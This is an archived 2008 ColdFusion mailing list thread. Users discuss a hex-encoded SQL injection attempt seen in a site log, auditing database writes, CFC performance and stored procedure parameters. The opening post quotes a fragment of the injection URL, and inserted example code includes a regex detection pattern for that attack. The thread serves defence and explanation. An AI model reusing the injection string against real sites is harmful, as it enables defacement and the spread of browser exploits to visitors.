Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-22 Thread Andreas Ertle
Just was looking at a 'user monitor' page on one of my sites and I saw the
url string below being called. I've seen several sql injection urls before,
but what the heck are they trying to accomplish here? Everything is
cfqueryparam'ed. Thanks, Che

/rss.cfm?';DECLARE @S CHAR(4000);SET
@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861

Hello,

naive question maybe, nevertheless:

Can someone confirm that having applied the Microsoft patch(es) mentioned on
http://www.microsoft.com/technet/security/bulletin/MS08-040.mspx
is sufficient to protect against attacks like these?

Has anyone who applied the patch(es) still been attacked and infected successfully?

~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to 
date
Get the Free Trial
http://ad.doubleclick.net/clk;203748912;27390454;j

Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309430
Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm
Unsubscribe: 
http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4


DataSource Events like Before Commit?

2008-07-22 Thread Joseph Bugeja
Dear ColdFusion Users,

Is there a way that I can attach to a datasource through an event like 
before_commit or before_update?

So, if I have a cfquery tag, could ColdFusion automatically execute another
query (for example to set the user id in the database) before it executes the
code found in the cfquery? In this way I would not need to make any
modification to the existing code, except creating the new code that runs
before my main query.
   
Thanks in advance for your assistance.

Regards,
Joseph. 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309431


RE: DataSource Events like Before Commit?

2008-07-22 Thread Experienced CF Developer
Joseph,

I don't think what you are trying to do is possible.  Can you give us some
more details of what you are trying to accomplish to see if we can help you
come up with an alternative solution?

Sincerely,

Dave Phillips

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309432


Re: DataSource Events like Before Commit?

2008-07-22 Thread Gert Franz
Well you can use database triggers on tables for this matter, if your 
queries are related to simple tables...

Greetings from Switzerland
Gert Franz
Railo Technologies GmbH
[EMAIL PROTECTED]
www.railo.ch

Join our Mailing List
german:http://de.groups.yahoo.com/group/railo/
english:   http://groups.yahoo.com/group/railo_talk/
linked in: http://www.linkedin.com/e/gis/71368/0CF7D323BBC1




Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309433


Does cfc filesize make a performance hit?

2008-07-22 Thread Mike Kear
I'm looking for milliseconds to shave off an app that creates XML
files. It consists of a cfc that takes a bean with LOTS of getters
and setters, and makes an XML file out of it.

What I have now is a cfc that has 107 methods. Each method makes a
fragment of the XML file, with some conditional logic, and one method
stitches them all together and returns a completed XML string.

My thought is that perhaps this app might run faster if, instead of one
CFC with 107 methods, the cfc were split into 4 or 5 different cfcs
that load as required.

So my question is, if there's no difference in the actual amount of
processing involved, would it be likely to run faster with one big cfc
or several small cfcs? Or to put it another way, is there a
performance hit when instantiating large CFCs? Greater than a number
of smaller CFCs? (The large one I have now has 3200 lines and 107
methods. It seems when I load it that there might be quite a bit of
parsing and syntax checking going on while it's being instantiated,
yes?)

-- 
Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
AFP Webworks
http://afpwebworks.com
ColdFusion 8 Enterprise , PHP, ASP, ASP.NET hosting from AUD$15/month

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309434


Re: DataSource Events like Before Commit?

2008-07-22 Thread Joseph Bugeja
Thanks for your reply. Let me explain our scenario.

We have a number of cfquery tags that insert, update and delete data from our 
Oracle database. Basically, before each query is run I need to execute a stored 
procedure. This stored procedure sets the userid (the user currently logged in) 
in the database for auditing purposes. We have hundreds of queries and it is 
not good from a design perspective to rewrite each query to call the same 
central piece of code before each query gets executed. 

So my original query should be:
  Original Query:
    <cfquery>
      DML Operation
    </cfquery>

New requirement should be:
    <cftransaction>
      <cfstoredproc>
        Set the user id
      </cfstoredproc>
      <cfquery>
        DML Operation
      </cfquery>
    </cftransaction>

As shown above, I need to call the cfstoredproc before each query is executed. 
Personally, I would prefer if I keep my original design and before the original 
query is run the ColdFusion engine automatically injects the new call in a 
transaction to set the clientid.

Do you have any suggestions?


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309435


Re: DataSource Events like Before Commit?

2008-07-22 Thread Dominic Watson
Are you using components for all your data access transactions (i.e.
dao, etc)? If so, and you are using ColdSpring (or some other bean
factory) to manage your cfcs, this would be a perfect place for AOP.
If you are not using a bean factory, you could create a lightweight
aop style function / component method that looks something like:

FUNCTION doDBTransaction
ARG1 - userId
ARG2 - daoObject
ARG3 - daoMethodToRun
ARG4 - daoMethodArgs

BEGIN TRANSACTION
DO code to store current user in db
SET returnVal = daoObject.daoMethodToRun(daoMethodArgs)
DO whatever cleanup code you may have
END TRANSACTION

RETURN returnVal

If you are not using components for your db transactions you could
possibly do something similar; perhaps passing in the name of
templates that hold the queries.

HTH

Dominic

--
Blog it up: http://fusion.dominicwatson.co.uk
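Dominic's sketch written out as tag-based CFML, as an added example that is not the poster's code (ColdFusion 8 has no cftransaction in cfscript, hence tags). The stored procedure name set_audit_user, the datasource application.dsn and the DAO being a CFC instance are assumptions; cftransaction requires the DAO's own queries to use that same datasource.

```cfml
<!--- Added example: wrap one DAO call so the audit user is set first,
      inside the same transaction. Procedure and datasource names are
      assumed. --->
<cfcomponent output="false">

    <cffunction name="doDBTransaction" access="public" returntype="any" output="false">
        <cfargument name="userId"         type="numeric" required="true">
        <cfargument name="daoObject"      type="any"     required="true">
        <cfargument name="daoMethodToRun" type="string"  required="true">
        <cfargument name="daoMethodArgs"  type="struct"  required="false" default="#structNew()#">
        <cfset var returnVal = "">

        <!--- Only allow methods the DAO actually exposes, so a caller cannot
              steer the dynamic invoke at an arbitrary function name. --->
        <cfif NOT structKeyExists(arguments.daoObject, arguments.daoMethodToRun)>
            <cfthrow type="AuditWrapper.UnknownMethod"
                     message="Method #arguments.daoMethodToRun# not found on DAO">
        </cfif>

        <cftransaction>
            <!--- Step 1: record who the current user is so the audit
                  triggers can read it (assumed procedure name). --->
            <cfstoredproc procedure="set_audit_user" datasource="#application.dsn#">
                <cfprocparam type="in" cfsqltype="cf_sql_integer" value="#arguments.userId#">
            </cfstoredproc>

            <!--- Step 2: the original DML method runs unchanged; its queries
                  must use application.dsn as well, which cftransaction
                  requires. --->
            <cfinvoke component="#arguments.daoObject#"
                      method="#arguments.daoMethodToRun#"
                      argumentcollection="#arguments.daoMethodArgs#"
                      returnvariable="returnVal">

            <!--- Step 3: whatever cleanup you may have goes here. --->
        </cftransaction>

        <cfreturn returnVal>
    </cffunction>

</cfcomponent>
```

Callers replace `dao.saveOrder(argumentCollection=args)` with `wrapper.doDBTransaction(session.userId, dao, "saveOrder", args)`, which is the only CFML change needed per call site.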

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309436


Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-22 Thread Kris Jones
This attack has nothing to do with elevation of privilege. It simply
tacks on a SQL procedure to a query existing on the page already. This
procedure then runs through the tables/columns in the database,
appending text to the end of content in varchar fields. The text appended
varies, but what I've seen is a javascript file call, that would run
when the affected content was displayed in a browser.

I can't see how that security patch would have anything to do with it.
(Please enlighten me if I'm wrong.)

 Can someone confirm that having applied the Microsoft patch(es) mentioned on
 http://www.microsoft.com/technet/security/bulletin/MS08-040.mspx
 is sufficient to protect against attacks like these?
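An added illustration of what Kris describes, seen from the rss.cfm side (this is not code from the thread): the concatenated form lets the appended batch run, the cfqueryparam form binds it as a plain value, and escaping on output covers content a successful run has already tampered with. The datasource name myDSN and the articles table are assumptions.

```cfml
<!--- Added example (not from the thread). "myDSN" and the articles
      table are assumed names. --->

<!--- VULNERABLE form, left commented out for contrast: url.id is pasted
      into the SQL text, so the "';DECLARE ..." tail seen in the log
      closes the string literal and runs as a second statement in the
      same batch. The 0x... argument to CAST is just the statement text
      in hex, which hides it from a casual look at the log.
<cfquery name="feed" datasource="myDSN">
    SELECT title, body FROM articles WHERE id = '#url.id#'
</cfquery>
--->

<!--- HARDENED form: cfqueryparam sends url.id as a bound parameter, so
      whatever it contains is compared as a value, never parsed as SQL.
      cf_sql_integer additionally makes ColdFusion reject non-numeric
      input before anything reaches the database. --->
<cfparam name="url.id" default="0">
<cfquery name="feed" datasource="myDSN">
    SELECT title, body
    FROM   articles
    WHERE  id = <cfqueryparam value="#url.id#" cfsqltype="cf_sql_integer">
</cfquery>

<!--- Second layer, for the effect Kris and Jerry describe: if script
      text has already been appended to varchar columns, escaping on
      output keeps it from running in visitors' browsers. --->
<cfcontent type="text/xml; charset=utf-8" reset="true"><?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
  <channel>
    <cfoutput query="feed">
    <item>
      <title>#XmlFormat(feed.title)#</title>
      <description>#XmlFormat(feed.body)#</description>
    </item>
    </cfoutput>
  </channel>
</rss>
```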

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309437


Re: Does cfc filesize make a performance hit?

2008-07-22 Thread Aaron Rouse
Even if you split it out, would the processing page not still end up calling
the same number of methods, unless you could redesign the build process
somehow? I sometimes wonder, if speed is the ultimate goal at any cost,
whether it might just be better to use included files with UDFs when needed
over CFCs.


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309438


RE: DataSource Events like Before Commit?

2008-07-22 Thread Experienced CF Developer
Joseph,

I think Gert's suggestion earlier could work for you.  You could design a
trigger to fire the stored procedure prior to any Inserts or Updates.  Check
out this page on Oracle's site for some direction:

http://tinyurl.com/5sjhlg

I haven't done anything with triggers myself.  But if you want to avoid
re-coding your CFML, I think this is your route to go.

Of course, this will only work for you if the only thing changing your
tables is your CF app.  Any manual changes to the database, or any other
application accessing the same database would fire the triggers as well,
unless you can figure out a way to make them fire only when your app
accesses the database.

Hope this helps,

Dave Phillips

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309439


Re: Problems with switching from application.cfm to application.cfc

2008-07-22 Thread gary gilbert
Richard,

You may want to check out the documentation on application.cfc before going any 
further...

Gary 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309440


Re: DataSource Events like Before Commit?

2008-07-22 Thread Aaron Rouse
You could make them fire based upon a null value or a value not being set at
all.  For example, if UserID is in fact passed in then do not fire the trigger,
but if UserID is not passed in then fire the trigger.  I think that would
then work fine for the CF pages interacting with things, and when
interacting manually, so long as the person doing the queries remembers the
triggers are in place, they could bypass them that way.  Although if
someone knew they were in place they could also just disable the trigger,
run whatever they needed to do and then re-enable the trigger.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309441


Re: DataSource Events like Before Commit?

2008-07-22 Thread Joseph Bugeja
Thanks again for your reply.

Unfortunately, I need to pass the userid prior to executing each query, as
otherwise the auditing function would not know the userid. We have triggers on
tables, but the triggers need to read the userid a priori.

ColdFusion does not allow us to build our connection string dynamically or to
dynamically inject connection string variables (such as the userid), as is the
case with VB.NET and C#. This is why I am looking for an alternative.


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309442


Re: Does cfc filesize make a performance hit?

2008-07-22 Thread Mike Kear
The logic has 3 or 4 major branches, so the total number of methods
called is about a third or a quarter of the total.

So the choice is to instantiate one 3000 line cfc with 107 methods,
only some of which get used, against 2 or 3 smaller cfcs where all the
methods get used.

So does anyone have a feel for whether there is a performance hit
from instantiating methods that never end up being used? On this
machine JRun is bloating up to 500MB or more, so the technique I'd
normally use of putting the cfc into a shared scope isn't an option.
We have to reduce things in memory as much as possible. On my test
machine, I run this cfc on 250 records in quick succession and it
brings the machine to its knees. JRun bloats to the point where
nothing else will run. I hate to think what would happen if I
released this thing into the wild.

Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
AFP Webworks
http://afpwebworks.com
ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309443


Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-22 Thread Jerry Johnson
The purpose of the hack is to change your website, so that each visitor is
hit with a series of browser exploit attempts while reading your website.

Some of the exploits attempted are handled by the MS patch. Some are not.

(Examples of the exploits: Ms06-014, flash, SP2, Realplayer11, Norton,
pxhack)



Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309444


RE: DataSource Events like Before Commit?

2008-07-22 Thread Experienced CF Developer
Got it.  Now I understand better.  You want to pass the userid of your
'logged in user' to track the change in the database instead of using the
user id that the datasource is logged in as.

I don't see any way for you to do this without changing your code.  Maybe
someone else can come up with something, but I just don't see any way around
it.  Whether you change it to implement the idea you had below or do it some
other way, bottom line is, you will need to change your code to make Oracle
aware of each individual user's ID.

You might still be able to find a way to use the triggers, but I still think
you'll need a code change.

Sorry, no help.

Dave
Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309445


Re: Does cfc filesize make a performance hit?

2008-07-22 Thread Sonny Savage
Are you storing the XML as a string or using the native CF XML object?
When working with large strings, I've obtained big speed increases by using
a Java StringBuffer object.

On Tue, Jul 22, 2008 at 8:32 AM, Mike Kear [EMAIL PROTECTED] wrote:

 The logic has 3 or 4 major branches, so the total number of methods
 called is about a third or a quarter of the total.

 So the choice is to instantiate one 3000 line cfc with 107 methods
 only some of which get used, against 2 or 3 smaller cfcs where all the
 methods get used.

 So does anyone have a feel for whether there is a performance hit
 from instantiating methods that never end up being used? On this
 machine JRun is bloating up to 500MB or more, so the technique I'd
 normally use of putting the cfc into a shared scope isn't an option.
 We have to reduce things in memory as much as possible. On my test
 machine, I run this cfc on 250 records in quick succession and it
 brings the machine to its knees. JRun bloats to the point where
 nothing else will run. I hate to think what would happen if I
 released this thing into the wild.

 Cheers
 Mike Kear
 Windsor, NSW, Australia
 Adobe Certified Advanced ColdFusion Developer
 AFP Webworks
 http://afpwebworks.com
 ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month


 On Tue, Jul 22, 2008 at 10:11 PM, Aaron Rouse [EMAIL PROTECTED] wrote:
  Even if you split it out, would the processing page not still end up
  calling the same amount of methods unless you could redesign the build
  process somehow? I sometimes wonder if speed is the ultimate goal and,
  at any cost, if it might just be better to use included files with UDFs
  when needed over CFCs.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309446


Re: Does cfc filesize make a performance hit?

2008-07-22 Thread Aaron Rouse
I know when one of our guys decided to take a complex series of included
files and put it into 4 CFCs to make things easier to manage that the pages
actually slowed down.  When he started to back track through things it
appeared the added overhead was from all of the method calls he was then
making.

A couple years ago I inherited a process that would bring a CF server down
to its knees when it would run, due to what appeared to be an issue with CF
never releasing resources after they were used until the page itself quit
running.  At the time the workaround, and it was not a pretty one, was to
send the processing to another page, so that it was another page call, but in
order for that to work on that version of CF at least it meant calling a web
service within the same application.

Our internal reservation system originally had a 5000 line CFC that it used
for the bulk of things.  Not sure how many methods were in it, I doubt
anywhere near 100 but I also know in most cases only 2-3 methods were ever
used.  When we split things out into 6 CFCs we saw no performance hit either
way.

On Tue, Jul 22, 2008 at 7:32 AM, Mike Kear [EMAIL PROTECTED] wrote:


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309447


Re: DataSource Events like Before Commit?

2008-07-22 Thread Joseph Bugeja
Exactly!

You perfectly understood my concern. If ColdFusion supported dynamic connection
parameter injection or proxy authentication then we could identify the connection
pool users, but there is no straightforward solution to this. Through pooling we
are connected through one db user, which for security compliance (PCI) is a hole
we need to remove while keeping the benefits of pooling. Triggers can certainly
help us with auditing, but again at db level I do not want to have the same user
showing up in my logs.

Got it.  Now I understand better.  You want to pass the userid of your
'logged in user' to track the change in the database instead of using the
user id that the datasource is logged in as.

I don't see any way for you to do this without changing your code.  Maybe
someone else can come up with something, but I just don't see any way around
it.  Whether you change it to implement the idea you had below or do it some
other way, bottom line is, you will need to change your code to make Oracle
aware of each individual user's ID.

You might still be able to find a way to use the triggers, but I still think
you'll need a code change.

Sorry, no help.

Dave
Thanks again for your reply.

Unfortunately, I need to pass the userid prior to executing each query as
otherwise the auditing function would not know the userid. We have triggers
on tables but triggers need to read the userid a priori.

ColdFusion does not allow us to build our connection string dynamically or
to dynamically inject connection string variables (such as the userid), as
is the case with VB.NET and C#. This is why I am looking for an alternative.

Joseph,

I think Gert's suggestion earlier could work for you.  You could design a
trigger to fire the stored procedure prior to any Inserts or Updates.
Check
a
before 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309448


RE: Mystery Character/ Adobe's Crack QC Team

2008-07-22 Thread Robert Harrison
http://livedocs.adobe.com/coldfusion/6/CFML_Reference/functions-pt121.html 

Well, thanks. That worked to get me the number of the character. It's 8226.
That will help.

I have to add, this is the second time I've copied a routine directly from
the Adobe web site, and it's the second time it didn't work as published.
Try it - it's missing the method="post" statement in <form> and won't run as
is.

They must have one heck of a crack QC team over there.


Robert B. Harrison
Director of Interactive services
Austin & Williams
125 Kennedy Drive, Suite 100 Hauppauge NY 11788
T : 631.231.6600 Ext. 119 
F : 631.434.7022
www.austin-williams.com

Great advertising can't be either/or... It must be .



Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309449


RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-22 Thread Andy Matthews
No, because those sites are still using the URL variables, just not visibly.


andy

-Original Message-
From: Che Vilnonis [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 3:39 PM
To: CF-Talk
Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

Here's another question. Are sites that rewrite URLs (i.e., no .cfm
extension in the url) more or less NOT being hit by these malbots?




Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309450


Re: Does cfc filesize make a performance hit?

2008-07-22 Thread Gerald Guido
Just a guess but it sounds more like CF's infamous string manipulation
memory issue than a CFC issue. This issue, and various workarounds, was
covered in great detail on CF-Talk about a month or so ago. I would do a
search on the cf_talk list looking for "memory issue", "string manipulation",
"java", etc.

HTH,
~G~

On Tue, Jul 22, 2008 at 8:32 AM, Mike Kear [EMAIL PROTECTED] wrote:


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309451


Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-22 Thread Gerald Guido
I saw this on the Riaforge update today. Looks like a SQL Jimmy wrapper for
your site.

http://portcullis.riaforge.org/
--
Portcullis is a CFC based url,form,cookie filter to help protect against SQL
Injection and XSS (Cross Site Scripting) attacks. This CFC can help filter
input, strip tags and escape HTML based on internal settings. It can also
log attacks and temporarily block future attempts based on a set time limit.
Portcullis can be installed into any ColdFusion application as a simple
shared scoped singleton.

1.0.5 (7/21/2008) - Added some key words to block the popular CAST()/ASCII
injection attack. Also, fixed a bug reported if ampersands are in the url
string it sometimes mixes up the variable naming
---

1.0.5 was updated yesterday. Coincidence? I think not. ;)

~G~


-- 
If everything seems under control, you're not going fast enough
-- Mario Andretti
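A request-level filter of the kind Portcullis provides, written as an added example for Application.cfc (this is not Portcullis code and not from the thread): it looks for the hex-encoded CAST()/DECLARE shape quoted at the top of the thread in the query string, logs the hit and refuses the request. The log file name and the 403 response are my choices.

```cfml
<!--- Added example, not from the thread and not Portcullis itself: a minimal
      request filter in Application.cfc that flags the hex-encoded
      CAST()/DECLARE injection pattern, logs it and stops the request.
      The log name and the 403 handling are assumptions of this example. --->
<cfcomponent output="false">
    <cfset this.name = "filterDemo">

    <cffunction name="looksLikeSqlInjection" access="public" returntype="boolean" output="false">
        <cfargument name="input" type="string" required="true">
        <cfset var decoded = arguments.input>
        <!--- markers of the pattern seen in the thread: a statement separator
              followed by DECLARE, a hex literal wrapped in CAST(), or EXEC of
              a built-up variable --->
        <cfset var pattern = ";\s*DECLARE\s+@|CAST\s*\(\s*0x[0-9a-f]+|EXEC\s*\(\s*@">

        <!--- decode once so %3BDECLARE and friends are tested in the clear;
              a malformed escape sequence falls back to the raw string --->
        <cftry>
            <cfset decoded = urlDecode(arguments.input)>
            <cfcatch type="any">
                <cfset decoded = arguments.input>
            </cfcatch>
        </cftry>

        <cfreturn reFindNoCase(pattern, decoded) GT 0>
    </cffunction>

    <cffunction name="onRequestStart" access="public" returntype="boolean" output="false">
        <cfargument name="targetPage" type="string" required="true">
        <cfif looksLikeSqlInjection(cgi.query_string)>
            <!--- keep the evidence: source address, page hit, start of the string --->
            <cflog file="sqli_attempts" type="warning"
                   text="blocked #cgi.remote_addr# #arguments.targetPage# qs=#left(cgi.query_string, 200)#">
            <cfheader statuscode="403" statustext="Forbidden">
            <cfabort>
        </cfif>
        <cfreturn true>
    </cffunction>
</cfcomponent>
```

This is a second layer, not a substitute for cfqueryparam, which keeps the injected text bound as data rather than SQL; a keyword filter can also trip on legitimate free text, so log first and watch the hit rate before enabling the abort.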


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309452


RE: DataSource Events like Before Commit?

2008-07-22 Thread Experienced CF Developer
Joseph,

I did some googling and found that Oracle has 'proxy user authentication'.
See this Ask Tom article (someone wanting to do the same thing as you are,
but in java):

http://tinyurl.com/6qe8xk

I don't know if you can do it with the ColdFusion setup directly, but maybe
you can access some underlying java component to do it.  Hopefully this
might give you another alternative.  Let me know how it turns out.

Dave 

-Original Message-
From: Joseph Bugeja [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, July 22, 2008 7:57 AM
To: CF-Talk
Subject: Re: DataSource Events like Before Commit?




Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309453


Easy way to dump contents of a CFC?

2008-07-22 Thread Gaulin, Mark
Hi
cfdump with a cfc shows the methods of the cfc.  Is there an easy way to
see the values stored in the CFC?  Does it work recursively, so if a cfc
member points to another cfc instance, then that cfc is dumped in the
same way?

We're on cfmx 6 and also 7.

Thanks
Mark

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309454


RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-22 Thread Rick Faircloth
Let me just jump in with a quick question or two about this...

Is this something that using cfqueryparam doesn't take care of?
Is this a serious enough problem that we need to use such measures
as Portcullis to defend our sites?

I do see form injection attempts at times through forms on my
clients' sites, but they've always been caught by cfqueryparam
and haven't caused any problems.

Rick

 -Original Message-
 From: Gerald Guido [mailto:[EMAIL PROTECTED]
 Sent: Tuesday, July 22, 2008 9:23 AM
 To: CF-Talk
 Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
 
 I saw this on the Riaforge update today. Looks like a SQL Jimmy wrapper for
 your site.
 
 http://portcullis.riaforge.org/
 --
 Portcullis is a CFC based url,form,cookie filter to help protect against SQL
 Injection and XSS (Cross Site Scripting) atacks. This CFC can help filter
 input, strip tags and escape HTML based on internal settings. It can also
 log attacks and temporarily block future attempts based on a set time limit.
 Portcullis can be installed into any ColdFusion application as a simple
 shared scoped singleton.
 
 1.0.5 (7/21/2008) - Added some key words to block the popular CAST()/ASCII
 injection attack. Also, fixed a bug reported if ampersands are in the url
 string it sometimes mixes up the variable naming
 ---
 
 1.0.5 was updated yesterday. Coincidence? I think not. ;)
 
 ~G~
 
 
 --
 If everything seems under control, you're not going fast enough
 -- Mario Andretti
 
 
 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309455


RE: Easy way to dump contents of a CFC?

2008-07-22 Thread Dawson, Michael
Similar to how other people store instance data, I create a CFC-based
struct variable, usually named instance.  Then, I create a
getInstance() function that returns the instance struct.

It will show me everything stored at the point in time the struct
variable is dumped.

It's not recursive, however.

m!ke

-Original Message-
From: Gaulin, Mark [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, July 22, 2008 8:30 AM
To: CF-Talk
Subject: Easy way to dump contents of a CFC?


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309456


Re: DataSource Events like Before Commit?

2008-07-22 Thread Joseph Bugeja
Dave,

That's exactly what I was looking for - proxy authentication. I created a
thread on this forum about this but the reply I got is that ColdFusion does not
natively support this. So, the solution is to create our own JNDI datasource
using Java. However, I decided not to go this way and instead set the client
identifier prior to executing each query. This should work and according to my
testing it does not inflict a heavy performance degradation.


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309457


Re: DataSource Events like Before Commit?

2008-07-22 Thread Aaron Rouse
Why not just set it in their session? Then you are only setting it once
and referencing that for each query you execute.

On Tue, Jul 22, 2008 at 9:06 AM, Joseph Bugeja [EMAIL PROTECTED] wrote:




Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309458


RE: do not increase counter is returns 0

2008-07-22 Thread Adrian Lynch
Hominid: Any member of the biological family Hominidae (the great apes),
including the extinct and extant humans, chimpanzees, gorillas, and
orangutans.

Thank you.

Adrian :OD

-Original Message-
From: Brian Kotek [mailto:[EMAIL PROTECTED]
Sent: 03 June 2008 21:08
To: CF-Talk
Subject: Re: do not increase counter is returns 0


Thank you, Charlie.

Yes, as you point out, I have tried over and over to explain things to Erik
as well as reiterate that what he asks about are things that would be
explained in the first few chapters of any book (or even website tutorial)
on the subject. Instead, he absolutely refuses to try to learn himself and
instead keeps on asking questions. Why? Because people keep answering them.
I'm trying to help him AND the list because the current situation is harming
both. But to be honest, the fact that Mr. Roberts misses the point
completely and resorts to the very ad hominid attacks he condemns is not
shocking in the slightest.


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309459


writing protected CF with CFStoredProc

2008-07-22 Thread Qing Xia
Hello folks:

The discussion yesterday regarding using CFqueryparam to protect sites from
SQL Injection attacks got me thinking.  Well, it is easy enough to use
CFQUERYPARAM everywhere inside CFQUERY tags, wherever a variable is passed
to the SQL query.

However, how do you do that with CFStoredProc?

If I understand correctly, if you want to protect calls to stored procs
(from SQL injection and the like), you have to use cfstoredproc and
cfprocparam instead of cfquery and cfqueryparam.  But apparently, you can't
indicate what parameters you're actually passing.  Am I missing something?

Say you had a proc that looked like this:

CREATE PROC sps_testproc
    @AID int = null,
    @BID int = null
AS
    IF @AID IS NOT NULL
        SELECT @AID
    IF @BID IS NOT NULL
        SELECT @BID

If I was using CFQUERY, unprotected-style, I might write this:

<cfquery ...>
    sps_testproc
    <cfif whichvar EQ "A">
        @aid=123
    <cfelse>
        @bid=456
    </cfif>
</cfquery>

If I was using CFSTOREDPROC, I might write this:

<cfstoredproc procedure="sps_testproc" ...>
    <cfprocparam type="in" cfsqltype="cf_sql_integer" value="123">
    ...
</cfstoredproc>

See my problem?  In my proc example, we don't need to know which of the two
params is going to be passed to it.  In the CFQUERY, I use that to pass one
param or the other depending on something else (the value of whichvar).
But as far as I can tell, CFSTOREDPROC doesn't let me tell it which
parameter I'm passing -- presumably it wants all parameters, in order.  So
maybe I need something like this:

<cfstoredproc procedure="sps_testproc" ...>
    <cfif whichvar EQ "A">
        <cfprocparam type="in" cfsqltype="cf_sql_integer" value="123">
        <cfprocparam type="in" cfsqltype="cf_sql_integer" value="null">
    <cfelse>
        <cfprocparam type="in" cfsqltype="cf_sql_integer" value="null">
        <cfprocparam type="in" cfsqltype="cf_sql_integer" value="456">
    </cfif>
</cfstoredproc>

That kind of sucks, right?  Am I making any sense?

Any thoughts and/or suggestions?


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309460


RE: writing protected CF with CFStoredProc

2008-07-22 Thread Andy Matthews
Why not pass both to the proc, then rewrite the proc so that rather than
testing for its existence, you're testing for whether or not it's blank?

-Original Message-
From: Qing Xia [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, July 22, 2008 9:21 AM
To: CF-Talk
Subject: writing protected CF with CFStoredProc





Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309461


RE: writing protected CF with CFStoredProc

2008-07-22 Thread Adrian Lynch
Yup, you're making sense. The way around it is to pass NULL in using:

cfprocparam null=true

Adrian

-Original Message-
From: Qing Xia [mailto:[EMAIL PROTECTED]
Sent: 22 July 2008 15:21
To: CF-Talk
Subject: writing protected CF with CFStoredProc


Hello folks:

The discussion yesterday regarding using CFqueryparam to protect sites from
SQL Injection attacks got me thinking.  Well, it is easy enough to use
CFQUERYPARAM everywhere inside CFQUERY tags, wherever a variable is passed
to the SQL query.

However, how do you do that with CFStoredProc?

If I understand correctly, if you want to protect calls to stored procs
(from SQL injection and the like), you have to use cfstoredproc and
cfprocparam instead of cfquery and cfqueryparam.  But apparently, you can't
indicate what parameters you're actually passing.  Am I missing something?

Say you had a proc that looked like this:

CREATE PROC sps_testproc
@AID int = null,
@BID int = null
as
IF @AID is not null
SELECT @AID
IF @AID is not NULL
SELECT @BID

If I was using CFQUERY, unprotected-style, I might write this:

cfquery ...
sps_testproc
cfif whichvar = A
@aid=123
cfelse
@bid=456
/cfif
/cfquery

If I was using CFSTOREDPROC, I might write this:

cfstoredproc procedure=sps_testproc...
cfprocparam type=in cfsqltype=cf_sql_integer value=123
..
/cfstoredproc

See my problem?  In my proc example, we don't need to know which of the two
params is going to be passed to it.  In the CFQUERY, I use that to pass one
param or the other depending on something else (the value of whichvar).
But as far as I can tell, CFSTOREDPROC doesn't let me tell it which
parameter I'm passing -- presumably it wants all parameters, in order.  So
maybe I need something like this:

<cfstoredproc procedure="sps_testproc" ...>
    <cfif whichvar EQ "A">
        <cfprocparam type="in" cfsqltype="cf_sql_integer" value="123">
        <cfprocparam type="in" cfsqltype="cf_sql_integer" value="null">
    <cfelse>
        <cfprocparam type="in" cfsqltype="cf_sql_integer" value="null">
        <cfprocparam type="in" cfsqltype="cf_sql_integer" value="456">
    </cfif>
</cfstoredproc>

That kind of sucks, right?  Am I making any sense?

Any thoughts and/or suggestions?

